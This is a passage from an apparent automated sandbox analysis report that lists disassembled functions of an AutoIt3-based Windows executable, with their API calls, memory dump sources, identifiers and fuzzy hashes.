                                                                                              • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                              • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                              Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteDestroyObject$IconWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3349847261-0
                                                                                              • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                              • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                              • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                              • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                              Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                              • String ID:
                                                                                              • API String ID: 2223660684-0
                                                                                              • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                              • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                              • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                              • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                              Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                              • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                              • EndPath.GDI32(?), ref: 00447336
                                                                                              • StrokePath.GDI32(?), ref: 00447344
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                              • String ID:
                                                                                              • API String ID: 2783949968-0
                                                                                              • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                              • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                              • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                              • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                              Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                              • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2710830443-0
                                                                                              • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                              • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                              • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                              • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                              Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                              • String ID:
                                                                                              • API String ID: 146765662-0
                                                                                              • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                              • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                              • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                              • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                              Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00472B63
                                                                                              • GetDC.USER32(00000000), ref: 00472B6C
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                              • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                              • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                              • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                              Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                              • GetDC.USER32(00000000), ref: 00472BBB
                                                                                              • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                              • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                              • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                              • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                              Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                              • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                              • __freeptd.LIBCMT ref: 0041516B
                                                                                              • ExitThread.KERNEL32 ref: 00415173
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                              • String ID:
                                                                                              • API String ID: 1454798553-0
                                                                                              • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                              • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                              • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                              • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                              Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strncmp
                                                                                              • String ID: Q\E
                                                                                              • API String ID: 909875538-2189900498
                                                                                              • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                              • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                              • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                              • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                              Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                              • String ID: AutoIt3GUI$Container
                                                                                              • API String ID: 2652923123-3941886329
                                                                                              • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                              • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                              • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                              • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                              Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove_strncmp
                                                                                              • String ID: U$\
                                                                                              • API String ID: 2666721431-100911408
                                                                                              • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                              • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                              • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                              • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                              Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                              • __wcsnicmp.LIBCMT ref: 00467288
                                                                                              • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                              • String ID: LPT
                                                                                              • API String ID: 3035604524-1350329615
                                                                                              • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                              • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                              • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                              • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                              Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: \$h
                                                                                              • API String ID: 4104443479-677774858
                                                                                              • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                              • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                              • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                              • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                              Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
